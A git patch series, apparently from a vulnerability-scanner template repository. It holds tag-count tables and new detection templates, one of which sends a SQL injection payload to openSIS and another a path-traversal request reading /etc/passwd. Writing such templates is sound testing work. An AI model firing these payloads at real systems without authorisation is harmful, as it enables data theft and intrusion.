| | | | | | -| seacms | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | | portainer | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| akkadian | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | | gitlist | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | | csrf | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | | finereport | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | | chinaunicom | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | | opentsdb | 1 | | | | | | | | | | tika | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | | nsasg | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| itop | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| jsf | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | | expose | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | | redis | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| email | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | | servicedesk | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | | vsftpd | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | | landrayoa | 1 | | | | | | | | | | chevereto | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | | wifisky | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| akkadian | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | | zcms | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 0f79e9d451..0804d72191 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| cve | 512 | dhiyaneshdk | 220 | cves | 519 | info | 535 | http | 1567 | | panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | | xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 202 | dns | 10 | | exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| rce | 174 | daffainfo | 99 | misconfiguration | 115 | | | | | | cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | | lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| wp-plugin | 120 | gy741 | 49 | file | 42 | | | | | | config | 90 | gaurang | 42 | workflows | 34 | | | | | From b1dfb89f88622b7d640fbe5b077464716bd0929c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 07:36:48 +0700 Subject: [PATCH 1177/4083] Create CVE-2020-6637.yaml --- cves/2020/CVE-2020-6637.yaml | 42 ++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2020/CVE-2020-6637.yaml diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml new file mode 100644 index 0000000000..5f0df353e6 --- /dev/null +++ b/cves/2020/CVE-2020-6637.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-6637 + +info: + name: OpenSIS v7.3 unauthenticated SQL injection + author: pikpikcu + severity: high + description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. + tags: cve,cve2020,sqli,opensis + reference: | + - https://hackerone.com/reports/643442 + - https://github.com/concrete5/concrete5/pull/7999 + - https://twitter.com/JacksonHHax/status/1389222207805661187 + +requests: + - method: GET + path: + - '{{BaseURL}}/account/index.php' + - '{{BaseURL}}/opensis/index.php' + - '{{BaseURL}}/index.php' + headers: + Content-Type: application/x-www-form-urlencoded + body: | + USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log= + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'SQL STATEMENT:' + - "" + + - type: word + part: header + words: + - "text/html" + condition: and + + - type: status + status: + - 200 From 96c03d93ccd223ebdbacfbd24d2fcf6d3c0aee70 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 07:38:49 +0700 Subject: [PATCH 1178/4083] Update CVE-2020-6637.yaml --- cves/2020/CVE-2020-6637.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml index 5f0df353e6..fea9cf3f27 100644 --- a/cves/2020/CVE-2020-6637.yaml +++ b/cves/2020/CVE-2020-6637.yaml @@ -7,9 +7,8 @@ info: description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. tags: cve,cve2020,sqli,opensis reference: | - - https://hackerone.com/reports/643442 - - https://github.com/concrete5/concrete5/pull/7999 - - https://twitter.com/JacksonHHax/status/1389222207805661187 + - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 + - https://cinzinga.com/CVE-2020-6637/ requests: - method: GET From 29e399df8789b1041b39f8a1f6b802ed9233ad05 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 07:43:02 +0700 Subject: [PATCH 1179/4083] Create opensis-lfi.yaml --- vulnerabilities/other/opensis-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/opensis-lfi.yaml diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml new file mode 100644 index 0000000000..b61b2bd930 --- /dev/null +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -0,0 +1,26 @@ +id: opensis-lfi + +info: + name: openSIS 5.1 - 'ajax.php' Local File Inclusion + author: pikpikcu + severity: high + reference: | + - https://www.exploit-db.com/exploits/38039 + - https://www.securityfocus.com/bid/56598/info + tags: opensis,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php " + - "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php " + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: From a91bb78a4515dbd569b0079229af872a99df7a30 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 08:06:17 +0700 Subject: [PATCH 1180/4083] Create acontent-detect.yaml --- technologies/acontent-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/acontent-detect.yaml diff --git a/technologies/acontent-detect.yaml b/technologies/acontent-detect.yaml new file mode 100644 index 0000000000..5eae4dc7e4 --- /dev/null +++ b/technologies/acontent-detect.yaml @@ -0,0 +1,25 @@ +id: acontent-detect + +info: + name: AContent Detect + author: pikpikcu + severity: info + tags: tech,acontent + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/AContent/login.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "AContent" + + - type: status + status: + - 200 From 72c038bbf1cb21e8e5420a459d41a4d626765301 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 08:07:21 +0700 Subject: [PATCH 1181/4083] Update opensis-lfi.yaml --- vulnerabilities/other/opensis-lfi.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git 